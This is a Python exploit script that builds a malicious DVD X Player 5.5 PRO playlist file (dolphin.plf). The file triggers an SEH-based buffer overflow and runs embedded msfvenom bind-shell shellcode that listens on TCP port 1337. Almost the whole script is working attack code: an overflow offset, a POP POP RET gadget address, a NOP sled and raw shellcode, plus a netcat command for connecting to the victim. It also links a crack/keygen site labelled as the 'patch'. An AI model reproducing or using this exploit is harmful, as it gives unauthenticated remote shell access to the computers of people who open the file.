#!/usr/bin/env python
import sys
#-----------------------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 PRO. Playlist file *.plf overflow #
# OS: Tested on Windows XP SP3 PRO only. The SEH gadget lives in the player's own EPG.dll, so it may carry over to other Windows versions where that module loads at the same base, but that is untested #
# Software: https://www.dvd-x-player.com/dvd-player/ #
# Patch: https://keygens.pro/crack/142564/ (third-party crack/keygen site, NOT a vendor security fix - treat the download as untrusted and likely malware-bundled; only ever handle it inside a disposable, isolated lab VM) #
# #
# Author: Oraclox (Brandon ceja) #
#-----------------------------------------------------------------------------------------------#
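filename = "dolphin.plf"
#-----------------------------------------------------------------------------------------------#
# Badchars: \x00 \x0A \x0D \x1A (bytes the .plf parser truncates on or mangles)                 #
# Shellcode: msfvenom -p windows/shell_bind_tcp LPORT=1337 -b "\x00\x0A\x0D\x1A" -f c           #
#                                                                                               #
# NOTE: a bind shell listens on the *victim* and hands a SYSTEM/user shell to anyone who can    #
# reach TCP/1337 - there is no authentication. Fire this only inside an isolated lab network.   #
#-----------------------------------------------------------------------------------------------#
# Connect with: nc -nv <victim-ip> 1337   (192.168.211.128 was the author's lab target)         #
#-----------------------------------------------------------------------------------------------#
# Every payload fragment below is a *bytes* literal and the file is written in binary mode.     #
# This is deliberate: under Python 3 a str "\x90" pushed through a text-mode handle is UTF-8    #
# encoded to two bytes (and newlines are translated), which silently shifts the offsets and     #
# corrupts the SEH address. Under Python 2, b"" is a plain str, so behaviour is unchanged.      #
#-----------------------------------------------------------------------------------------------#
BADCHARS = b"\x00\x0A\x0D\x1A"
shellcode = (
    b"\xd9\xee\xba\x98\xa0\x24\x0c\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    b"\x53\x31\x56\x17\x03\x56\x17\x83\x76\x5c\xc6\xf9\x7a\x75\x85"
    b"\x02\x82\x86\xea\x8b\x67\xb7\x2a\xef\xec\xe8\x9a\x7b\xa0\x04"
    b"\x50\x29\x50\x9e\x14\xe6\x57\x17\x92\xd0\x56\xa8\x8f\x21\xf9"
    b"\x2a\xd2\x75\xd9\x13\x1d\x88\x18\x53\x40\x61\x48\x0c\x0e\xd4"
    b"\x7c\x39\x5a\xe5\xf7\x71\x4a\x6d\xe4\xc2\x6d\x5c\xbb\x59\x34"
    b"\x7e\x3a\x8d\x4c\x37\x24\xd2\x69\x81\xdf\x20\x05\x10\x09\x79"
    b"\xe6\xbf\x74\xb5\x15\xc1\xb1\x72\xc6\xb4\xcb\x80\x7b\xcf\x08"
    b"\xfa\xa7\x5a\x8a\x5c\x23\xfc\x76\x5c\xe0\x9b\xfd\x52\x4d\xef"
    b"\x59\x77\x50\x3c\xd2\x83\xd9\xc3\x34\x02\x99\xe7\x90\x4e\x79"
    b"\x89\x81\x2a\x2c\xb6\xd1\x94\x91\x12\x9a\x39\xc5\x2e\xc1\x55"
    b"\x2a\x03\xf9\xa5\x24\x14\x8a\x97\xeb\x8e\x04\x94\x64\x09\xd3"
    b"\xdb\x5e\xed\x4b\x22\x61\x0e\x42\xe1\x35\x5e\xfc\xc0\x35\x35"
    b"\xfc\xed\xe3\xa0\xf4\x48\x5c\xd7\xf9\x2b\x0c\x57\x51\xc4\x46"
    b"\x58\x8e\xf4\x68\xb2\xa7\x9d\x94\x3d\xc2\x64\x10\xdb\xa6\x86"
    b"\x74\x73\x5e\x65\xa3\x4c\xf9\x96\x81\xe4\x6d\xde\xc3\x33\x92"
    b"\xdf\xc1\x13\x04\x54\x06\xa0\x35\x6b\x03\x80\x22\xfc\xd9\x41"
    b"\x01\x9c\xde\x4b\xf1\x3d\x4c\x10\x01\x4b\x6d\x8f\x56\x1c\x43"
    b"\xc6\x32\xb0\xfa\x70\x20\x49\x9a\xbb\xe0\x96\x5f\x45\xe9\x5b"
    b"\xdb\x61\xf9\xa5\xe4\x2d\xad\x79\xb3\xfb\x1b\x3c\x6d\x4a\xf5"
    b"\x96\xc2\x04\x91\x6f\x29\x97\xe7\x6f\x64\x61\x07\xc1\xd1\x34"
    b"\x38\xee\xb5\xb0\x41\x12\x26\x3e\x98\x96\x56\x75\x80\xbf\xfe"
    b"\xd0\x51\x82\x62\xe3\x8c\xc1\x9a\x60\x24\xba\x58\x78\x4d\xbf"
    b"\x25\x3e\xbe\xcd\x36\xab\xc0\x62\x36\xfe"
)
#-----------------------------------------------------------------------------------------------#
# Description:                                                                                  #
# (1) The run of A's overflows the playlist buffer and reaches the SEH record on the stack.     #
# (2) SEH (the handler pointer) is overwritten with a POP POP RET gadget. When the corrupted    #
#     handler is dispatched, POP POP RET returns into nSEH - i.e. into bytes we control.        #
# (3) nSEH holds JMP SHORT +6 (\xEB\x06). Measured from the end of that 2-byte jump it skips    #
#     the 2-byte NOP pad and the 4-byte SEH address and lands in the NOP sled, which slides     #
#     into the shellcode.                                                                       #
# (4) The trailing D's are filler only; they keep the file at its fixed 2000-byte length.       #
#-----------------------------------------------------------------------------------------------#
# nSEH offset: 608 bytes                                                                        #
# SEH  = 0x61617619 : pop esi # pop edi # ret | EPG.dll (no bad chars in the address; the        #
#        module ships with the player and is presumably not SafeSEH/rebased, or the overwrite   #
#        would not be honoured - confirm with !safeseh / module flags)                          #
# nSEH = "\xEB\x06" jmp short +6, padded with two NOPs to fill the 4-byte field                 #
#-----------------------------------------------------------------------------------------------#
NSEH_OFFSET = 608                   # bytes of filler before the nSEH field
NSEH = b"\xEB\x06\x90\x90"          # jmp short +6 ; nop ; nop
SEH = b"\x19\x76\x61\x61"           # 0x61617619, little-endian
PAYLOAD_SPACE = 1384                # bytes available after SEH for sled + shellcode + filler

evil = b"\x90" * 20 + shellcode     # short NOP sled so the jump has slack, then the payload

if len(evil) > PAYLOAD_SPACE:
    # The original silently dropped the D-filler here (a negative repeat count yields an
    # empty string) and wrote an over-long file. The offsets above assume a fixed layout,
    # so fail loudly instead.
    raise ValueError("payload is %d bytes, only %d available" % (len(evil), PAYLOAD_SPACE))

# Structure: AAA...AAA nSEH SEH nops+shellcode DDDD...DDDD
buffer = b"A" * NSEH_OFFSET + NSEH + SEH + evil + b"D" * (PAYLOAD_SPACE - len(evil))

# Check the *finished* file against the bad-character list, not just the shellcode: a stray
# bad byte in the filler, nSEH or SEH address would truncate or mangle what the player reads.
bad = [hex(b) for b in bytearray(BADCHARS) if b in bytearray(buffer)]
if bad:
    raise ValueError("bad characters present in buffer: %s" % ", ".join(bad))

# Binary mode: no codec, no newline translation, handle closed even on error.
with open(filename, "wb") as plf:
    plf.write(buffer)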